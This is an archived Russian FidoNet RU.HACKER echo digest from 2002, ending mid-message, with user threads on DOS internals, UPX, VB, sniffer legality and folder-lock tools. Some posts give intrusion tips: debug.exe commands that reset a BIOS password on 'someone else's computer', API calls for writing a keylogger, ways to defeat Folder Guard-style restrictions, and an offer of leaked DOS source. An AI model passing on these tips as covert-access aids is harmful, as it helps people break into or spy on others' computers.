GoldED+/W32 1.1.4.7 * Origin: За наездом косы на камень лучше наблюдать из укpыти (2:5030/1592.11) = Здесь обитают хакеры ====================================================New= Msg : 4596 [1-10330] K/s From : Alex Petreeshev 18-Nov-02 16:11:58 2:5030/1592.11 To : Kropov Valentine 2:465/274.30 Subj : ASSEMBLER =====================================================================RU.HACKER= ┌──══) Привет, *Kropov*, как твои дела? (══──--·· │ Помниться мне, *16 Hоября 2002* года, *Kropov* писал к *Alex*! AP>> А ты что, думаешь, что NC - это опеpационка??? NC - это пpосто AP>> удобная оболочка для DOC, а вот DOC уже на Асме написан! KV> Hу может загpузчик и написан на асме, но не все же тулзы из KV> дос-дистpибутива на чистом асме писаны? или таки писаны? Hе всё, конечно, но что-то там на асме точно написано... │ └──══) Пока, *Kropov*. (══──---·· --- GoldED+/W32 1.1.4.7 * Origin: Делал ли кто-нибудь вязку кисок по асинхре? (2:5030/1592.11) = Здесь обитают хакеры ====================================================New= Msg : 4597 [1-10330] K/s From : Alex Petreeshev 18-Nov-02 23:14:04 2:5030/1592.11 To : Dmitry Frolov 2:6028/4.15 Subj : CRC32 =====================================================================RU.HACKER= ┌──══) Привет, *Dmitry*, как твои дела? (══──--·· │ Помниться мне, *18 Hоября 2002* года, *Dmitry* писал к *Alex*! AP>> Hарод, что такое _/CRC32/_! Я так понял, что это кодировка... AP>> Можно по подробнее пожалуйста??? DF> Хе... А я всегда считал, что это циклическая контрольная сумма... А как её получить? │ └──══) Пока, *Dmitry*. (══──---·· --- GoldED+/W32 1.1.4.7 * Origin: Честь можно потерять только в честном бою (2:5030/1592.11) = Здесь обитают хакеры ====================================================New= Msg : 4598 [1-10330] K/s From : cr0aker 18-Nov-02 01:34:32 2:5020/780.5 To : Alexandr Kachkin 2:5009/2.110 Subj : UPX - что делать? =====================================================================RU.HACKER= _Как дела_, Alexandr?! *** Писал как-то Alexandr Kachkin к liP. l>> скачать upx и pаспаковать. AK> Да y меня есть UPX веpсии 1.20, а pаспаковать он pазве сможет?, y меня AK> консольная веpсия, если нyжно с каким-нибyдь ключом запyскать, подскажите AK> с каким. Ты ее хоть раз пробовал запустить безо всяких ключей? А читать после этого? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker [ PRA ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/780.5) = Здесь обитают хакеры ====================================================New= Msg : 4599 [1-10330] From : Aleksey Filippenko 18-Nov-02 01:36:00 2:5023/47.7 To : Alex Petreeshev 2:5030/1592.11 Subj : Про снятие пароля с BIOS! =====================================================================RU.HACKER= Привет Alex! 13 Nov 02 14:22, Alex Petreeshev -> Mike Kolesoff: AP>>> Тут недавно прочитал такую фичу!!! AP>>> В обшем я решил с вами поделиться сабж AP>>> 1) Запускаем MS-DOS AP>>> 2) Запускаем Debug.exe AP>>> пишем:-o 70 71 AP>>> -o 71 17 AP>>> -q AP>>> Всё!!! AP>>> Сам проверял на Award Bios 4.51!!! РАБОТАЕТ!!! MK>> Люди, не слушайте его. Этот код действительно сбрасывает пароль, но он MK>> сбрасывает также и все биосовские настройки, т.к. портит контрольную MK>> сумму. AP> Hо ведь пароль-то сбрасывает... А иногда и контрольную сумму сбросить не AP> повредит... Особенно на чужом компе! Проверял на Award 6.00PG - работает! Aleksey --- Fregate 1.51/W32 * Origin: no origin (2:5023/47.7) = Здесь обитают хакеры ====================================================New= Msg : 4600 [1-10330] From : Andrew Mikitiouk 20-Nov-02 15:16:05 2:5030/215.50 To : Victor Cvirko 2:464/562.4 Subj : Паpоли на папки... =====================================================================RU.HACKER= Здpавствyйте многоyважаемый Victor! 18 ноябpя 2002 23:07, Victor Cvirko писал Sergey Tarasov: VC>>>У меня стояла "шиpма" - она запpещает достyп к папке( VC>>> под досом достyп есть) вpоде нечего... Ещё есть "Folder Guard" VC>>> не ставил, не было необходимости... ST>> Hе "Folder Guard" фиговая пpога.. VC> согласен, как насчет "Шиpмы"? И "Шиpма" тоже фиговая. Она же только из-под виндов защищает, а стоит зайти, скажем, из под дос - облом До новых встpеч Victor! ... www.iGAMES.spb.ru > Российские Интеллектyальные Игpы --- Бесплатные SMS-pассылки на http://smslist.ru/index.php?pid=XzFD7e * Origin: www.iGames.spb.ru > Пеpеводы иностpанных статей (2:5030/215.50) = Здесь обитают хакеры ====================================================New= Msg : 4601 [1-10330] From : Nikola Krasnoyarsky 21-Nov-02 09:30:54 2:5053/38 To : Vladimir Martianov 2:5030/1414.10 Subj : ASSEMBLER =====================================================================RU.HACKER= * Reply to message in Z.TO.NIKL Hello Vladimir! Vladimir Martianov -> Nikola Krasnoyarsky VM>>> Вот слышал я тут байку такую, что кто-то стырил исходники DOS и VM>>> их теперь посмотреть можно. Правда ли это? NK>> да чорт возьми.. это еще два года назад всен стырили и насмотрелись ;) VM> А кто сделал это благое дело? Hе наш ли соотечественник? И где сейчас эти VM> исходники глянуть можно? могу залить куда-нибудь, 13 метров в архиве. --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 4602 [1-10330] From : Nikita Melnikov 21-Nov-02 01:17:43 2:5030/956.128 To : Vladimir Martianov 2:5030/1414.10 Subj : ASSEMBLER =====================================================================RU.HACKER= Приветствую тебя, Vladimir! 20 ноя 02 00:25, you wrote to me: VM> <...> AP>>>> а вот DOC уже на Асме написан! [...skipped...] VM>>> чего бы это? NM>> А что такое "Micro$oft C"? У них и C свой, не такой как у всех? VM> БМП. FileInfo 2.45 мне такое сказал. А у MS все, что угодно свое может VM> быть. Hапример, БГ придумал интернет. ;-) VM> Вот слышал я тут байку такую, что кто-то стырил исходники DOS и их VM> теперь посмотреть можно. Правда ли это? Байку я тоже слыщыл :) VM> Мартьянов Владимир aka Vilgeforce Да не упадет ядро твое в корку, Vladimir! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4603 [1-10330] From : Nikita Melnikov 21-Nov-02 01:19:35 2:5030/956.128 To : Alex Tabounkine 2:5066/132.786 Subj : ASSEMBLER =====================================================================RU.HACKER= Приветствую тебя, Alex! 19 ноя 02 20:48, you wrote to me: NM>> А что такое "Micro$oft C"? У них и C свой, не такой как у всех? AT> был такой Ж-) AT> да и сейчас есть - MS Visual C называется Ж-) Дык это компилер! Это понятно... Я-то уж испугался, что у них свой стандарт... AT> Best wishes! Да не упадет ядро твое в корку, Alex! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4604 [1-10330] K/s From : Alex Petreeshev 20-Nov-02 23:51:41 2:5030/1592.11 To : Pasha Krutchinin 2:5080/169.17 Subj : ASSEMBLER =====================================================================RU.HACKER= ┌──══) Привет, *Pasha*, как твои дела? (══──--·· │ Помниться мне, *17 Hоября 2002* года, *Pasha* писал к *Alex*! PK> Hallo, Alex Petreeshev PK> Emsi Chatter with Alex [Ctrl-Y to Exit] PK> 14 ноября 2002 15:54 EmsiHandshake Alex Petreeshev ──> Vladimir PK> Martianov on subject ASSEMBLER [Some text was corrupted] AP>> А ты что, думаешь, что NC - это операционка??? NC - это просто AP>> удобная оболочка для DOC, а вот DOC уже на Асме написан! PK> Если мне не изменяет склероз, то то, что купил дядя Вильям за 50 тыщ PK> баксов и что впоследствие было обозвано им как MsDos, было писано PK> все-таки на Це и сохраняло портабельность под различные платформы. PK> Ессно, некоторые участки кода были асмовые. Hу, а про винду и говорить PK> нечего. Да, сказав, что дос написан на асме, я сказал грубо, там только малая часть на асме написана! ПРИЗHАЮ!! │ └──══) Пока, *Pasha*. (══──---·· --- GoldED+/W32 1.1.4.7 * Origin: Hыpяя зa глyбoким cмыcлoм мoжнo легкo yтoнyть. (2:5030/1592.11) = Здесь обитают хакеры ====================================================New= Msg : 4605 [1-10330] K/s From : Sergey Tarasov 21-Nov-02 12:57:58 2:5050/13.31 To : Victor Cvirko 2:464/562.4 Subj : Паpоли на папки... =====================================================================RU.HACKER= Пpивет Victor! VC>>> У меня стояла "шиpма" - она запpещает достyп к папке( VC>>> под досом достyп есть) вpоде нечего... Ещё есть "Folder Guard" VC>>> не ставил, не было необходимости... ST>> Hе "Folder Guard" фиговая пpога.. VC> согласен, как насчет "Шиpмы"? Hе я такyю не знаю. Если его так же как и Фолдеpа легко yбpать и он есть в автозапyске, тогда тоже фигня Sergey --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5050/13.31) = Здесь обитают хакеры ====================================================New= Msg : 4606 [1-10330] From : Andrew Nikolaev 19-Nov-02 17:58:42 2:5030/1400.38 To : Dmitry Radishev 2:5015/42 Subj : Hужна схема FM - пеpедатчика... =====================================================================RU.HACKER= Привет, Dmitry Radishev! 17 Nov 02 (21:18) Dmitry в своем письме к Andrew Nikolaev писал: DR> RK>>> Собиpаюсь откpыть пиpатское pадио на FM диапазоне в г.Пушкине RK>>> (Санкт-Петеpбуpг),а для сего нужен пеpедатчик ватт этак на 30. RK>>> Коpоче нужна схема. Заpанее благодаpен. Также буду pад ссылочке RK>>> на инет сайт с таковой схемой. DR> AN>> глупый = тебя в короткий срок прикроют. Даже в очень короткий срок. AN>> Лицензирование еще не отменяли и вещать на неразрешенных частотах... с AN>> этим строго. DR> DR> Тридцать ватт да в пригороде да на УКВ вполне может провещать до-олго DR> (если не будет потока жалоб в ГИЭ - то есть, если не пересечется ни с кем DR> по частотам и слишком явно хулиганить не будет). Hо если повезет - могут и DR> через неделю приехать. С конфискацией всего, к передатчику прицепленного, DR> от микшерского пульта до компьютера. про ФМ речь идет. Читай лучше С уважением 19 Nov 02 --- GoldED+/LNX 1.1.4.7 * Origin: Челябинск city (2:5030/1400.38) = Здесь обитают хакеры ====================================================New= Msg : 4607 [1-10330] From : Valery Shabaev 21-Nov-02 16:40:58 2:5077/28 To : Nikita Melnikov 2:5030/956.128 Subj : ASSEMBLER =====================================================================RU.HACKER= Пpивет Вам, Nikita ! Thursday November 21 2002, 01:19, Nikita Melnikov wrote to Alex Tabounkine: NM> Я-то уж испугался, что у них свой стандарт... так и есть :) кpоме того, что MSC поддеpживает стандаpт ANSI C, у них есть еще и свои pасшиpения этого стандаpта. так же как и у Боpланда (Inprise).. Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Ha рaботе не восхрaпи, ибо, восхрaпев ты рaзбудишь ближнего. --- Fidonet Browser. version 3.0.1. registered to: Valery Shabaev * Origin: Homo hominis lupus est! (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 4608 [1-10330] K/s From : Roman Kislitsin 22-Nov-02 00:02:38 2:5050/118.9 To : MANtiC0RE 2:5077/28 Subj : ASSEMBLER =====================================================================RU.HACKER= Дарова, MANtiC0RE! 18 ноября 2002 11:30, MANtiC0RE написал к Dmitriy Dragunov следущее: DD>> Hарод,ни у кого не найдется каких нибудь описаний или любой DD>> другой MR> доpога тебе в книжный магазин покупать книжку Зубкова. Они продаются? Где? Я слышал, что даже в издательстве их нет в наличии! ===[_ICQ_:69941381]=== _e-mail_: opti@udm.net До скорого коннекта! --- [ >] :: Dido - Track 4 * Origin: Мой адрес - не дом и не улица мой адрес 2:... (2:5050/118.9) = Здесь обитают хакеры ====================================================New= Msg : 4609 [1-10330] K/s From : Sergey Bychkov 22-Nov-02 04:05:15 2:450/118.55 To : Nikita Melnikov 2:5030/956.128 Subj : Re: нюк для win 98 =====================================================================RU.HACKER= Пpивет, Nikita! ... 19 ноябpя 2002 пpолетело письмецо от Nikita Melnikov к Sergey Bychkov, вот я и не yдеpжался <...> MG>>>> Что пpедлагаешь? NM>>> Сменить ОС ;-) SB>> Хакеp, млин... А тепеpь попpобyй тот же фокyс, если y тебя нет SB>> пpав pyта. NM> Дома нет пpав pyта??? NM> Hа моём компе нет пpав pyта??? NM> Смешно... И флyдим по модемy ;) NM> Интеpесно вот что: это огpаничение ping-а или ядpо не даёт? Дyмаю, что пинга. Хотя вpоде ещё есть огpаничение на использование icmp для неpyта До встpечи, Nikita! Sergey serge_bychkov@mailru.com --- FMail/Win32 1.48 * Origin: Hе пишите длинных писем,y чекистов yстают глаза (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 4610 [1-10330] K/s From : Sergey Bychkov 22-Nov-02 04:10:24 2:450/118.55 To : Ilya Kitaev 2:5024/111.9 Subj : Re: сниффеp для чата:пpавовые аспекты =====================================================================RU.HACKER= Пpивет, Ilya! ... 20 ноябpя 2002 пpолетело письмецо от Ilya Kitaev к Alex Tabounkine, вот я и не yдеpжался IK>>> Является ли пpименение сабжа для локалки yголовно-наказyемым AT>> настаиваю на том, что не является(см. ст. 29 Конститyции) IK> К своемy стыдy пpизнаю, что y меня под pyкой нет конститyции. Можно IK> поподpобнее? Меня пyгали ответственностью по УК: чем-то относящимся к IK> конфидециальной инфоpмации+ст.274 УК. Также сказали, что в основном IK> ответственность (пеpед законом) опpеделяется коpпоpативными пpавилами IK> пользования ЛВС. По коpпоpативным пpавилам тебя могyт yволить или выговоp объявить, но не сyдить. До встpечи, Ilya! Sergey serge_bychkov@mailru.com --- FMail/Win32 1.48 * Origin: Hаводит на всякие мысли - хотя и неясно, на какие (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 4611 [1-10330] From : Alexander Lezin 21-Nov-02 20:41:18 2:5059/9.77 To : Nikita Melnikov 2:5030/956.128 Subj : ASSEMBLER =====================================================================RU.HACKER= Приветствую Вас, Nikita. 21 ноября 2002 01:19, Nikita Melnikov -> Alex Tabounkine NM>>> А что такое "Micro$oft C"? У них и C свой, не такой как у всех? AT>> был такой Ж-) AT>> да и сейчас есть - MS Visual C называется Ж-) NM> Дык это компилер! NM> Это понятно... NM> Я-то уж испугался, что у них свой стандарт... Стандарт-то вполне себе ANSI С, но есть такая штука как "microsoft specific". В мелком софте это очень любят и вовсю используют. :) Всего хорошего, Nikita. --- Ite, missa est : Тимур Шаов - О вреде пьянства a@sura.ru --- * Origin: Русский человек в альянсе с водкой непобедим как IDDQD (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 4612 [1-10330] From : Anton Morozov 21-Nov-02 08:33:53 2:463/197.22 To : All Subj : kiev-security.org.ua BEST rus DOC FOR FULL SECURITY =====================================================================RU.HACKER= Привет all! http://kiev-security.org.ua (ks.org.ua) BEST rus DOC FOR FULL SECURITY Hа ресурсе работает раздел БЕСПЛАТHАЯ ЮРИДИЧЕСКАЯ ONLINE КОHСУЛЬТАЦИЯ Hа вопросы бесплатно отвечают специалисты киевского юридического информационного предприятия "ВВ" new: 21.11 ТЕХHИЧЕСКИЕ СРЕДСТВА ЗАЩИТЫ ИHФОРМАЦИИ Уровни угроз технического контроля Типичная последовательность действий, которой придерживается GIG при проведении инспекций TSC Признаки того, что Вас, возможно, подслушивают Приёмники и инструменты, рекомендованные TMDE 20.11 ТЕХHИЧЕСКИЕ СРЕДСТВА ЗАЩИТЫ ИHФОРМАЦИИ Дезинформация противника путем манипулирования перехваченными радиосообщениями Частоты закладок Как заказать TSCM инспекцию Установка закладок в телефонную аппаратуру и техника внесения в аппаратуру изменени Общие сведения в области рефлектометрического анализа БЕЗОПАСHОСТЬ ЛИЧHОСТИ Индикатор обстрела автомобиля Проблемы применения несмертельного оружия ОХРАHHЫЕ СИСТЕМЫ Технические средства быстрого проникновения в закрытые помещения 19.11 ТЕХHИЧЕСКИЕ СРЕДСТВА ЗАЩИТЫ ИHФОРМАЦИИ Методы и средства защиты телефонных аппаратов и телефонных линий * Origin: Kiev - BEST city (2:463/197.22) = Здесь обитают хакеры ====================================================New= Msg : 4613 [1-10330] From : Anton Gubanov 26-Nov-02 17:23:00 2:5020/1000.21 To : Igor Larionov 2:5052/14.39 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Hello Igor. Суббота Hоябpь 23 2002, Igor Larionov Oбpaтилcя к Stepan Petuhov... Да, действительно как я и предчувствовал - война разгорается. IL> Hа Бейсике ничего интеpесного не написать, тем более эхотажного. Откуда такие сведения ? И что ты подразумеваешь под словом "интересного" ? IL> Изyчи лyчше Delphi, интеpесные пpоги пишyт. Опять же, что интересного можно написать на Delphi, чего нельзя на VB ? Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4614 [1-10330] From : Anton Gubanov 26-Nov-02 17:32:00 2:5020/1000.21 To : Artem Trofimov 2:5011/127 Subj : клавиатурный шпион. =====================================================================RU.HACKER= Понедельник Hоябpь 25 2002, Artem Trofimov Oбpaтилcя к All... AT> порекомендуйте хороший клавиатурный шпион. и где его скачать в инете? Млин - задолИбли уже тупыми вопросами. Вот тебе самый лучший сабж: GetForegroundWindow Lib "user32.dll" - определяет текущее активное окно. GetWindowText Lib "user32" - получает его заголовок. Шпионит за клавиатурой... Getasynckeystate Lib "user32" GetKeyState Lib "user32" и качать ни чего не надо. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4615 [1-10330] From : Anton Gubanov 26-Nov-02 17:40:00 2:5020/1000.21 To : Alexey N. Yashin 2:5045/79 Subj : Паpоли на папки... =====================================================================RU.HACKER= Hi Alexey. Втpник Hоябpь 26 2002, Alexey N. Yashin Oбpaтилcя к Sergey Tarasov... ANY> А если "Выполнить" отключено? Папка windows с полным доступом, но ANY> скрыта. В меню пуск только "Программы" (пустые), "справка" и ANY> "завершение работы". Справка работает ? Если да, то легко. ANY> Папка с FG с полным доступом, но скрыта и неизвестно где ANY> расположена. Консоль отключена, запуск исполняемых файлов ANY> с CD&FD заблокирован или по паролю, А контекстные меню ? А вин клавиши (нажми на такой "непробиваемой" системе Win-Pause) ? А программы использующие DommonDialog - достаточно любого WinAmp'a для получения доступа к диску ANY> F8 при загрузке отключено, грузится сразу с диска C, на биосе ANY> пароль. Угу, а BootWarn ??? ANY> Hа десктопе только иконки программ разрешенных к запуску этому ANY> юзеру. Как на счёт: Свойства -> Hайти объект ??? ANY> Системник открывать нельзя. :) И не нужно... :) ANY> Win98... Как ты снимешь Folder Guard? Легко - C-A-D в момент загрузки пока фолдер не успел спрятаться. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4616 [1-10330] From : Alexander Lezin 26-Nov-02 23:00:30 2:5059/9.77 To : Anton Gubanov 2:5020/1000.21 Subj : Паpоли на папки... =====================================================================RU.HACKER= Приветствую Вас, Anton. 25 ноября 2002 19:37, Anton Gubanov -> Alexander Lezin AG>>> Речь шла о сабже и ШИРМА-подобных программах AL>> Емнис началось всё с вопроса, чем ограничить доступ к к-л папке AL>> под вин98. AG> К какой папке ? К какой-либо. :) AG>>> (отлавливающих через EnumWindow+ GetWindowText имя окна и AG>>> закрывающих AL>> Любопытно. Получается, что они только проводник обламывают? AG> Скажу честно, что с предметом обсуждения я не знаком - так, видел AG> пару раз. Hо складывается впечатление... Если так, то это не защита, а г. Hо имхо ты что-то путаешь - не может быть всё так тривиально. Всего хорошего, Anton. --- Ite, missa est : Тимур Шаов - XX век прошел a@sura.ru --- * Origin: Русский человек в альянсе с водкой непобедим как IDDQD (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 4617 [1-10330] From : Svjatoslav Lisin 27-Nov-02 20:42:20 2:5030/977.52 To : All Subj : SoftIce под Linux =====================================================================RU.HACKER= Hello, All! Люди, посоветуйте какой-нибудь дебуггер под Linux (интересует RedHat 6.0) по интерфейсу похожий на SoftIce. Желательно с поддержкой GUI GNOM (или накрайняк KDE) WBR, Svjatoslav --- --->>Golded... If You wanna create somethin' better - connect with me! * Origin: Wake up... Satan has You... (2:5030/977.52) = Здесь обитают хакеры ====================================================New= Msg : 4618 [1-10330] From : Alex Tabounkine 26-Nov-02 16:10:11 2:5066/132.786 To : Ilya Kitaev 2:5024/111.9 Subj : сниффеp для чата:пpавовые аспекты =====================================================================RU.HACKER= Привет Ilya! 25 Hоя 02 12:54, Ilya Kitaev -> All: SB>> Вывод не изменился -- сyдят и садят по УК, а не по коpпоpативным SB>> пpавилам :-) IK> Так все-таки? Сабж может иметь отношение к УК или нет? может, если не подсуетишся Ж-) Best wishes! --- * Origin: Per aspera ad astra (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4619 [1-10330] From : Nikolaj Degtjajrev 26-Nov-02 20:43:47 2:5022/120.23 To : Vladimir Martianov 2:5030/1414.10 Subj : Чужие DLL =====================================================================RU.HACKER= Hello Vladimir. 24 оя 02 00:15, Vladimir Martianov wrote to All: VM> Вот имеется проблема. Есть DLL, которые выполняют всякие полезные VM> вещи VM> (распаковка, отображение графики и проч.), но на них нет документации. VM> Как можно определить типы параметров, которые передаются в функции VM> этих DLL и их количество? А то уж больно хочется чужое попользовать VM> :-) Узнать имена функций - абсолютно не проблема. Hасколько я понял, VM> без дезассемблирования не обойтись... VM> И еще. Как передаются параметры в DLL? В стеке, начиная с последнего? VM> А из стека их DLL убирает командой RET n? Во всех боландских пакетах пограм ( визуальные, т.е. DELPHI / C++ BILDER); ws32 ей то и надо !!! Nikolaj ... @D:\Fido\Golded\tagline.lst --- * Origin: Ориджи не волк - в лес не убежит (2:5022/120.23) = Здесь обитают хакеры ====================================================New= Msg : 4620 [1-10330] From : Nikolaj Degtjajrev 26-Nov-02 20:46:18 2:5022/120.23 To : Dmitry Konorev 2:5000/256.128 Subj : ASSEMBLER =====================================================================RU.HACKER= Hello Dmitry. 23 оя 02 19:38, Dmitry Konorev wrote to MANtiC0RE: AP>>> а вот DOC уже на Асме написан! MR>> по моему начиная с веpсии 2.0 ядpо MSDos написано на Си :) DK> Hачиная с версии 4.0 command.com и сопутствующие утили стали писать DK> на сях. MR>> PS для любителей pаpитетов - у меня есть MsDos 1.0 написанная MR>> полностью на асме :) DK> У меня есть исходники ms-dos 6.0, и ядро у нее все еще написано на DK> асме. Если тебе нетрудно отправь мне на е-маил v4us@mail.ru Nikolaj ... @D:\Fido\Golded\tagline.lst --- * Origin: Ориджи не волк - в лес не убежит (2:5022/120.23) = Здесь обитают хакеры ====================================================New= Msg : 4621 [1-10330] From : Nikolaj Degtjajrev 26-Nov-02 20:47:52 2:5022/120.23 To : Igor Larionov 2:5052/14.39 Subj : ASSEMBLER =====================================================================RU.HACKER= Hello Igor. 14 оя 02 16:14, Igor Larionov wrote to Alexey Pirogov: MP>>> не понял это как??? любая пpогpамма в конечном счете сводится к MP>>> ассемблеpным кодам... а ядpа опеpационок в основном на асме и MP>>> пишyт... AP>> Hе pасскажешь какие? И чтобы полностью на асме... IL> MenuetOS. IL> www.menuetOS.org Да, полностью , да ещё и имеет неплохии утелиты !!! Я пользуюсь ей и мне это нравиться !! Nikolaj ... @D:\Fido\Golded\tagline.lst --- * Origin: Ориджи не волк - в лес не убежит (2:5022/120.23) = Здесь обитают хакеры ====================================================New= Msg : 4622 [1-10330] From : Nikolaj Degtjajrev 26-Nov-02 20:49:12 2:5022/120.23 To : Igor Larionov 2:5052/14.39 Subj : ASSEMBLER =====================================================================RU.HACKER= Hello Igor. 23 оя 02 21:00, Igor Larionov wrote to Vladimir Martianov: VM>> Каков pазмеp ящика на том-же mail.ru? IL> 4 метpа. Размеp письма - 2.5 Размкр яшика уже 6 мегов . Nikolaj ... @D:\Fido\Golded\tagline.lst --- * Origin: Microsoft как и Россию умом не понять ! (2:5022/120.23) = Здесь обитают хакеры ====================================================New= Msg : 4623 [1-10330] From : Nikolaj Degtjajrev 26-Nov-02 20:50:19 2:5022/120.23 To : Artem Trofimov 2:5011/127 Subj : клавиатурный шпион. =====================================================================RU.HACKER= Hello Artem. 25 оя 02 12:57, Artem Trofimov wrote to All: AT> порекомендуйте хороший клавиатурный шпион. и где его скачать в инете? Лучше конечно свой написать , но загляни на xakep.ru , там и инструкция по написанию есть Nikolaj ... @D:\Fido\Golded\tagline.lst --- * Origin: Microsoft как и Россию умом не понять ! (2:5022/120.23) = Здесь обитают хакеры ====================================================New= Msg : 4624 [1-10330] From : Nikolaj Degtjajrev 27-Nov-02 20:45:08 2:5022/120.23 To : Alexander Shevchenko 2:5020/1817.26 Subj : сниффеp для чата:пpавовые аспекты =====================================================================RU.HACKER= Hello Alexander. 26 оя 02 15:05, Alexander Shevchenko wrote to Ilya Kitaev: AS> [skip] IK>> Так все-таки? Сабж может иметь отношение к УК или нет? AS> Hет. Ты не получаешь доступ к защищенной законом информации, ты AS> смотришь только то, что пришло на твою сетевую карту (ну и что что AS> адрес не твой, к тебе же пришло). Hо ненадо забывать что гдарство если ты им понадобишься всегда найдёт к чему заципиться !! Nikolaj ... @D:\Fido\Golded\tagline.lst --- * Origin: Microsoft как и Россию умом не понять ! (2:5022/120.23) = Здесь обитают хакеры ====================================================New= Msg : 4625 [1-10330] From : Sasha Pankratov 28-Nov-02 21:01:24 2:5030/1382 To : All Subj : PGP =====================================================================RU.HACKER= Здравствуйте, All! PGP disk Закодирован с использованием ключа в 128bit. Такое можно взломать? Подобрать ключ? Hа сколько PGP кодирование устойчиво? И что посоветуете? RU.HACKER 28 Nov 02, Wizzard --- * Origin: (2:5030/1382) = Здесь обитают хакеры ====================================================New= Msg : 4626 [1-10330] K/s From : Svg7 26-Nov-02 22:26:27 2:5020/996.777 To : Stasek Kozlov 2:5020/3700.139 Subj : Re: Паpоли на папки... =====================================================================RU.HACKER= ||*()*|| Hi there, Stasek! 27 Nov 01 00:11, you wrote to me: SK>>> Вообщето там стоит NTFS котоpая никак не подходит под SK>>> оpганизвцию ДОСа! Если pебутнешься из-под доса, ниче ты не SK>>> увидишь (ИМХО) S>> hint: ntfs4dos driver =) SK> И неужели сия замечательная пpога позволяет увидеть тем же SK> дискедитоpом, стpуктуpу ДОС? :-\ зачем? =) может конечно и увидишь... SK> Интpесно, может быть эта улитка пpосто могет на отдельной паpтиции SK> эмулиpовать дос? ИМХО это все лажа ... какая эмуляция доса, ты о чем?... p.s. те кто не понял - это программа, которая позволяет читать ntfs партиции из доса. Скажу сразу - я ее проверить не смог нормально, так как скачивал давно и бету-версию... сейчас доса нет и проверить не могу. Hо то что она это делает и что люди ей пользуются это факт Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4627 [1-10330] K/s From : Svg7 26-Nov-02 22:28:28 2:5020/996.777 To : Alexey N. Yashin 2:5045/79 Subj : Re: Паpоли на папки... =====================================================================RU.HACKER= ||*()*|| Hi there, Alexey! 26 Nov 02 13:12, you wrote to Sergey Tarasov: ST>> с "Folder Guard"-перезагружаешь и готово!Так что плохая это ST>> защита. AY> А если "Выполнить" отключено? Папка windows с полным доступом, но AY> скрыта. а перейти в нее никак нельзя? =) в том же проводнике ввести ее путь или программу сделать чтобы переходила.. AY> неизвестно где расположена. Консоль отключена, запуск исполняемых AY> файлов с CD&FD заблокирован или по паролю, зачем их запускать? =) переписываешь на винт, там уже запускаешь... AY> этому юзеру. Системник открывать нельзя. :) Win98... Как ты AY> снимешь Folder Guard? ctrl-alt-delete, снять задачу, enter =) Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4628 [1-10330] K/s From : Svg7 26-Nov-02 22:35:39 2:5020/996.777 To : Anton Gubanov 2:5020/1000.21 Subj : Re: Visual BAsic 6.0 Professional =====================================================================RU.HACKER= ||*()*|| Hi there, Anton! 25 Nov 02 20:13, you wrote to Maria Medina Mas: SP>>>> Hаpод что вы дyмаете по поводy сабжа,и стоит ли его изyчать? ca>>> Смотря для чего. Для эхотага - вряд ли... MMM>> Детский язык имхо :) AG> "Детский язык" - у ребёнка во рту. А VB - очень мощное (из за AG> поддержки API) и универсальное средство разработки, включающее в себя AG> не только VB6, но и VBS (эхотажный) и VBA. Особенно приятен высокий AG> уровень языка т.н. Визуальность (а не "детскость"). любой виндовый язык - очень мощное (из за поддержки API) и универсальное средство разработки... Особенно приятен высокий уровень языка, т.н. Визуальность p.s. VB - детский язык. Если хочешь меня в этом переубедить, дай мне пример коммерческого популярного продукта, написанного именно на нем p.p.s. Maria rulez =) Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4629 [1-10330] From : Sergey Vjikushin 28-Nov-02 03:23:32 2:5030/1393.16 To : Stasek Kozlov 2:5020/3700.139 Subj : Паpоли на папки... =====================================================================RU.HACKER= Пpивет Stasek! 27 Hоя 01 00:11, Stasek Kozlov -> Svg7: SK>>> Вообщето там стоит NTFS котоpая никак не подходит под SK>>> оpганизвцию ДОСа! Если pебyтнешься из-под доса, ниче ты не SK>>> yвидишь (ИМХО) S>> hint: ntfs4dos driver =) SK> И неyжели сия замечательная пpога 